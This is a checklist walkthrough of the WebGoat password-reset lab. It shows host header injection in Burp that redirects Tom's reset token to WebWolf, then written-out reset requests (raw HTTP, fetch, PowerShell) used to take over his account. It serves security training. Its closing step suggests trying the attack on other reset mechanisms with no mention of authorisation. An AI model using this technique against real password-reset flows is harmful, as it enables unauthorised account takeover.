===================================================================
PASSWORD RESET HIJACKING - QUICK START CHECKLIST
===================================================================

TARGET: Change Tom's password by hijacking his reset link
METHOD: Host Header Injection via Burp Suite

===================================================================
PREREQUISITES
===================================================================

[ ] Burp Suite installed and running
[ ] Browser configured to use Burp proxy (127.0.0.1:8080)
[ ] WebWolf accessible at http://localhost:9090
[ ] WebGoat Password Reset challenge page open

===================================================================
ATTACK CHECKLIST
===================================================================

STEP 1: SETUP BURP SUITE
[ ] Open Burp Suite
[ ] Go to Proxy tab
[ ] Click "Intercept is on" (button should be orange)
[ ] Verify proxy listener is on 127.0.0.1:8080

STEP 2: CONFIGURE BROWSER
[ ] Set browser proxy to 127.0.0.1:8080
[ ] Or enable FoxyProxy with Burp profile
[ ] Test by visiting any website (should see in Burp)

STEP 3: OPEN WEBWOLF
[ ] Navigate to: http://localhost:9090/WebWolf/login
[ ] Login with your WebGoat username/password
[ ] Go to "Incoming requests" or "Requests" tab
[ ] Keep this window open to monitor incoming requests

STEP 4: REQUEST PASSWORD RESET
[ ] In WebGoat, go to Password Reset challenge
[ ] Enter email: tom@webgoat-cloud.org
[ ] Click "Submit" or "Forgot your password?"
[ ] Request will be intercepted by Burp

STEP 5: MODIFY REQUEST IN BURP
[ ] In Burp "Intercept" tab, you should see the request
[ ] Find the line: Host: localhost:8080
[ ] Change it to: Host: localhost:9090
[ ] Verify email parameter is: email=tom@webgoat-cloud.org
[ ] Click "Forward" button
[ ] Turn off "Intercept is on" (button becomes gray)

STEP 6: CAPTURE TOKEN IN WEBWOLF
[ ] Go back to WebWolf window
[ ] Refresh the "Incoming requests" page
[ ] Look for a request with "token=" parameter
[ ] Copy the entire token value (long alphanumeric string)
[ ] Example: token=abc123def456ghi789...

STEP 7: RESET TOM'S PASSWORD
Option A - Use Burp Repeater:
[ ] In Burp, go to Repeater tab
[ ] Create new request:
    POST /WebGoat/PasswordReset/reset/reset-password/{TOKEN} HTTP/1.1
    Host: 192.168.254.112:8001
    Content-Type: application/x-www-form-urlencoded
    
    newPassword=MyNewPassword123
[ ] Replace {TOKEN} with captured token
[ ] Click "Send"
[ ] Check response for success

Option B - Use Browser Console:
[ ] Open browser console (F12)
[ ] Paste and modify this code:
    fetch('/WebGoat/PasswordReset/reset/reset-password/YOUR_TOKEN_HERE', {
        method: 'POST',
        headers: {'Content-Type': 'application/x-www-form-urlencoded'},
        body: 'newPassword=MyNewPassword123'
    }).then(r => r.json()).then(d => console.log(d));
[ ] Replace YOUR_TOKEN_HERE with captured token
[ ] Press Enter

Option C - Use PowerShell:
[ ] Run: .\password_reset_hijack.ps1
[ ] Or manually:
    Invoke-WebRequest -Uri "http://192.168.254.112:8001/WebGoat/PasswordReset/reset/reset-password/YOUR_TOKEN" `
        -Method POST `
        -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} `
        -Body "newPassword=MyNewPassword123"

STEP 8: LOGIN AS TOM
[ ] Go to WebGoat login page
[ ] Enter credentials:
    Username: tom
    Password: MyNewPassword123
[ ] Click Login
[ ] Verify you're logged in as Tom
[ ] Challenge completed!

===================================================================
TROUBLESHOOTING
===================================================================

PROBLEM: Burp not intercepting requests
SOLUTION:
[ ] Check Proxy > Options > Proxy Listeners is running
[ ] Verify browser proxy settings: 127.0.0.1:8080
[ ] Check "Intercept is on" button is orange
[ ] Try visiting http://burp to test proxy

PROBLEM: WebWolf shows no incoming requests
SOLUTION:
[ ] Verify you changed Host header to localhost:9090
[ ] Check WebWolf is running: docker ps | grep webwolf
[ ] Try refreshing WebWolf page
[ ] Look in different tabs: "Requests", "Incoming", "Mail"

PROBLEM: Token expired
SOLUTION:
[ ] Tokens are time-limited (usually 5-10 minutes)
[ ] Start over from Step 4 (request new reset)
[ ] Work faster from capture to password reset

PROBLEM: Password reset fails
SOLUTION:
[ ] Verify token is correct (no extra spaces)
[ ] Check URL format: /reset-password/{token}
[ ] Make sure request is POST, not GET
[ ] Verify Content-Type header is set

PROBLEM: Can't login as Tom
SOLUTION:
[ ] Double-check password you set
[ ] Verify password reset was successful
[ ] Check for response message in previous step
[ ] Try the whole process again

===================================================================
VERIFICATION
===================================================================

Success indicators:
[ ] Burp showed modified request with Host: localhost:9090
[ ] WebWolf captured a request with token parameter
[ ] Password reset returned success message
[ ] Can login to WebGoat as user "tom"
[ ] Challenge marked as completed in WebGoat

===================================================================
NEXT STEPS
===================================================================

After completing this challenge:
[ ] Document the vulnerability for your report
[ ] Try similar attacks on other password reset mechanisms
[ ] Move to next Authentication challenge
[ ] Review security best practices for password resets

===================================================================
